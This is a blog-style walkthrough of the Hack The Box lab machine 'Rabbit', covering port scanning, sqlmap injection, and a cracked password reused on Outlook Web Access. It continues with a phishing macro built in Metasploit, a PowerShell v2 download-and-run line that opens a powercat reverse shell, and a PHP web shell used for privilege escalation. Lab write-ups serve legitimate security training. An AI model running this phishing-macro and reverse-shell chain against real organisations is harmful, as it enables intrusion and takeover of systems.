HackBook
  • WhoAmi
  • Active Directory
    • Abusing AdminSDHolder for Persistence
    • Kerberoasting
    • What is Kerberos and how it works (ar)
  • HTB
    • Forest
    • Rabbit
Powered by GitBook
On this page
  • Quick Summary
  • Enumeration
  • Nmap
  • ffuf
  • SQL Injection
  • sqlmap
  • Foothold
  • Macro
  • Privilege Escalation

Was this helpful?

  1. HTB

Rabbit

Quick Summary

it’s one of my favorite boxes Rabbit is a fairly realistic machine which provides excellent practice for client-side attacks and web app enumeration. What I love about this machine the phishing part and making a macro and getting in so let's jump in.

Enumeration

Nmap

let's start with nmap which shows a lot of Ports

sudo nmap -sC -sV -p- 10.10.10.71 --min-rate=5000

[sudo] password for hebo: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 21:16 EET
Warning: 10.10.10.71 giving up on port because retransmission cap hit (10).
Nmap scan report for Rabbit.htb.local (10.10.10.71)
Host is up (1.2s latency).
Not shown: 40956 filtered ports, 24555 closed ports
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.16.136], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW, 
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT 
| smtp-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp    open  http          Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-11-18 00:22:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
443/tcp   open  ssl/https?
|_ssl-date: 2020-11-18T00:25:55+00:00; +5h04m10s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp   open  microsoft-ds?
587/tcp   open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.16.136], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, 
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT 
| smtp-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
808/tcp   open  ccproxy-http?
3306/tcp  open  mysql         MySQL 5.7.19
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.19
|   Thread ID: 11
|   Capabilities flags: 63487
|   Some Capabilities: Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, Support41Auth, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsCompression, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, LongPassword, ODBCClient, SupportsTransactions, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: }8;4\x18\x0D\x17\x12\x05&\x01\x0E\x1B\x10.s1/\x19%
|_  Auth Plugin Name: mysql_native_password
5722/tcp  open  msrpc         Microsoft Windows RPC
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6003/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6006/tcp  open  msrpc         Microsoft Windows RPC
6008/tcp  open  msrpc         Microsoft Windows RPC
6144/tcp  open  msrpc         Microsoft Windows RPC
8080/tcp  open  http          Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
28192/tcp open  msrpc         Microsoft Windows RPC
28219/tcp open  msrpc         Microsoft Windows RPC
28274/tcp open  msrpc         Microsoft Windows RPC
28309/tcp open  msrpc         Microsoft Windows RPC
28328/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h04m09s, deviation: 0s, median: 5h04m09s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 400.99 seconds

there is a lot of ports and services so I will start with web cuz there is 3 open ports for web which is 8080,443,80 so let's start ffuf to find some hidden dirs

ffuf

for HTTPS port 443 

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.71/FUZZ 
public
exchange
rpc
owa

owa is outlook web app which needs creds to login

port 8080 got us very intresting dirs

cgi-bin
INDEX
icons
%20
joomla
complain
phpmyadmin
%2Acheckout%2A.php
%2Acheckout%2A

i checked Joomla and spent a lot of time in it and there was nothing After reviewing the pages discovered and fall into several rabbit holes, i went to complain Complain Management System which was the odd one

SQL Injection

there was a registration i registered as a customer and logged in

i searched for exploits for Complain Management System cuz it looks very old

searchsploit complain
searchsploit -x php/webapps/42968.txt

i checked all of it and there was a SQL injection in 

http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans
parameter --> id

i copied the request to file using burp to pass it to sqlmap

sqlmap

sqlmap -r complain.req -dbms mysql --technique=U

to dump the database

sqlmap -r complain.req -dbms mysql --technique=U --dump

there was no thing intresting so i --dbs to find other databases

sqlmap -r complain.req -dbms mysql --technique=U --dbs 

[*] complain
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] secret
[*] sys

secert looks intresting so i dumped it there was hashes and i let sqlmap to crack it

When finding passwords on a network it is worth seeing if they can be used for other services. Attempting to login to Outlook Web Access as Ariel is successful

Foothold

I tried a lot but OWA the only on was successful 

Ariel:pussycatdolls

i opend all messages and the administrator asked him to report his weekly TPS and informed him that The security team has deployed windows defender and PowerShell constrain mode as the default organization security standard.

which we can bypass using powershell version 2 cuz PowerShell constrain mode is implemented in PowerShell version 5 you can know more about this mode from here 

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes?view=powershell-6

looks like we are going to make a phishing attack using macros

Macro

After a lot of searching i found that there is a module in metasploit to making a macro first time i tried to do it with cobalt strike but it didn't work so i used metasploit instade

msf5 > use exploit/multi/misc/openoffice_document_macro
msf5 exploit(multi/misc/openoffice_document_macro) > show options

we need to edit the macro to be able to get a reverse shell i changed the name file to zip to edit it Basic/Standard/Module1.xml

i used powercat to get a reverse shell 

https://github.com/besimorhino/powercat
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.xx.xx/powercat.ps1');powercat -c 10.10.xx.xx -p 1234 -e cmd

then change the name back to .odt

now send it to all users in an email

after while we got a shell

Privilege Escalation

I usually follow this guide for privesc

https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

I checked out the list of processes and their respective owners.

powershell -version 2 -c " & {Get-WmiObject -Query "'Select * from Win32_Process'" | where {$_.Name -notlike "'svchost*'"} | Select Name, Handle, @{Label="'Owner'";Expression={$_.GetOwner().User}} | ft -AutoSize }"

and looks like apache and mysql is running as root

We see that the Web service of port 8080 is served by Wamp64.Let’s see if we have write permissions and who’s running it:

we can write on it so let's upload our shell

i used this shell 

https://github.com/artyuum/Simple-PHP-Web-Shell

and we are root

PreviousForest

Last updated 4 years ago

Was this helpful?